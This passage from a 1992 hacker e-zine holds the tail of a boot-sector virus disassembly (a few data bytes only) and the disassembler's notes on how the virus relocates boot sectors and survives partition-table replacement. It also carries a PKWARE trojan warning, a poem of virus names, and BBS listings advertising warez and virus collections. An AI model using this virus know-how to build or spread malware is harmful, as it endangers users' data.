32h, 1, 0, 0 db 0, 0, 0 db 53h, 53h, 20h, 20h, 43h, 4Fh db 4Dh db 58 dup (0) db 55h, 0AAh seg_a ends ;Last notes this virus looks like a poor hack job on the stoned virus. ;It is kinda cool in the fact that it is hard to get out of the partition table ;even if you nuke the partition table it will live on even if you replace it. ;the only way to get it out of the partition table is 1. debug 2.clean ver 86b ;3 cpav 1.0 and above. oh yeah and all that special shit that came out for it ;this virus uses int 1ah which doesn't work on an XT system. ;the virus isn't actually 512 but that is how much it writes. ;it moves the boot area of a floppy to the last sector on the disk ;and on a harddrive it moves it to the last sector in the root directory ;This should show you all how much the media can over do it on things ;since this is really a lame virus, to tell you the truth there is a lot better ;ones out there. ;This in no way is a complete listing of the code for the virus. ;Nor is it the best since i'm not the best at Assembly. ;Done by Visionary. ;BTW to who ever wrote this virus... Get a life! ------------------------------------------------------------------------------- 03/16/1992 WARNING! WARNING! WARNING! WARNING! WARNING! WARNING! WARNING! -------------------------------------------------------------------- There is a file being circulated on BBS's called PKZ201.ZIP or PKZ201.EXE or similar, and that claims to be version 2.01 of PKZIP but in fact is a hacked version of PKZIP 1.93 Alpha. As of the date of this writing, the latest version of PKZIP is version 1.10. If you see the files PKZ201.ZIP or PKZ201.EXE on any BBS or on-line system, please ask the SysOp of that system to remove the files IMMEDIATELY, and please contact PKWARE to report where the files were seen. Of course, because of this PKWARE will never release a version of PKZIP with the version number 2.01. If you have any information about the source of PKZ201.EXE or PKZ201.ZIP, please report it to PKWARE immediately, either: by Voice at 414-354-8699 by BBS at 414-354-8670 by FAX at 414-354-8559 or by mail: PKWARE Inc. 9025 N. Deerwood Drive Brown Deer, WI 53223 USA Sincerely, Phil Katz President, PKWARE Inc. ------------------------------------------------------------------------------- A VIRUS POEM By: Brooks Hilliard There's Beta and Manta,Get Password and CB Amstrad and Leningrad,F-Word and BeBe Haifa,Messina,Enigma,Gergana Tequila,Azuza and Nina,Vienna. There's Smily and Shirly,Israeli and Anthrax and Yankee and Miky,Raubkopi,Oropax. There's Newcom and Checksum and Boojum and Prism and Incom and Phantom and Planinum and Skism. There's Scrambler and Squeaker and Joker,Disk Killer, Filler Despoiler and Green Caterpillar. Theres Jojo,Ohio and Spanish April Fool, Frodo and Turbo,Jerusalem Mule. There's Sadist and Chemist and Cinderella. Burger and Ogre and Finger and Kalah. Azusa,Eliza,Zargosa and Sotcha, Macedonia,Albania,Necrophilia and Gotcha. Theres Palette and Merritt, and Friday the 13th and Saddam and Virdem and Saturday 14th. There's Typo,Empire,and Topo,and Ping Pong, Mosquito,and Fire,and Psycho,and Lao Doung. Theres USSR and Ambulance Car, And Wonder,Surrender and Redstar and Spar Bugares,Vorohezh,Xabaras,and Flash Microbes and Irish,Addidas and Crash. There's Timid,New Zealand,Bloody! and Tiny DI. There's Stupid and Lovechild and Froggie and Lehigh. There's Stoned and Scotts Valley and Happy N.Y. There's Cascade,Black Wizard and also Bad Guy. There's Frere Jacques,Maraudar,Invader, Vacsina Rybka and also Darth Vader. There's Barcelona and Nomenkla-tara, and then Montezuma and Hydra and Cara. There's Music,Icelandic,Generic and Whale, There's Lisbon and Pentagon and Phalcon and Yale. Pirate and Mutant and Fumble and Hello There's Patient and Advent and Michelangelo. That's 130 viruses,smaller and greater If you don't get protected,You'll lose all your data. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Section [9]: IIRG Distribution Sites ////// ////// /////// //////// // // // // // // // /////// // //// // // // // // // ////// * ////// * // // * ///////// IIRG World HQ: Dark Shadows 19.2/9600 Baud HST 24 Hours a Day 1.2 Gigs Online (203)-628-9660 IIRG Distribution Site 1: Restaurant at the End of the Universe 2400/1200 Baud (3 Nodes!!) 24 hours a day 130 Megs of Files (203)567-8903 2 Nodes 2400 (203)567-4808 1 Node 1200 IIRG Distribution Site 2: The Generic Access BBS INC New England Regional District HQs IUD New England Regional District HQs 1.2 gigs online USR Dual Standard HST NO Ratios (508) 281-3961 IIRG Distribution Site 3: The Sanitarium Sysops: Morbid Angel [INC/ACID] Spectral Illusion [ACID/RAZOR] IIRG Distribution Site ACID Member Board INC Courier Board RAZOR 1911 Courier Board VISA World Headquarters (817)PRI-VATE IIRG Distribution Site 4: CTHH 666 2400 - 57.6 Baud Sysop: Beelzebub HAU AB! East Coast Headquarters Hackers Alliance Of The Underground Abuse I.I.R.G. Distribution Site -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Section [9]: Phantasy Distribution Sites Phantasy's Distribution Site's are continually growing, we apologize if you called a board and didn't find the Mag. Network Distribution Sites will have the Issues first, we suggest calling one of them if a problem does arise. 1. Lightning Systems (414) 363-4282 Sixty Million Bytes OnLine USRobotics Dual Standard HST/V.32bis 2400 thru 14.4k v.32bis/HST 2. Sycamore Elite 19,200-1200 Baud HST, 24 Hours a day (815) 895-5573 3. The Works BBS at (617-861-8976) Largest Text Files BBS in the world, 3500+ text files online. 2400-300 Baud, 24 Hours a day 4. Pipers Pit BBS 19,200-9600 HST ONLY!! 24 Hours a Day THG Distro Site 1300 Megs (203)PRI-VATE [2 Nodes] 5. Blitzkrieg BBS TAP Magazine (502)-499-8933 P.O. BOX 20264 Home of TAP MAgazine Louisville,KY. 40250-0264 6. The Dickinson Nightlight (713)-337-1452 Der WeltanSchauung Distro Site (World View Magazine) Phantasy Distro Site 7. Lucid Dreams SysOp: Louis Cypher Number: (713)522-0709 Running: Flashback Speed: USR DS 38.4 0-1 Day Warez 1400 T-Files 300+ Virii Net: TcH PHANTASY is also available on: 1. RIPCO BBS (312)528-5020 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- PHANTASY(C) IIRG 1991,1992 May Odin Guide Your Way! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-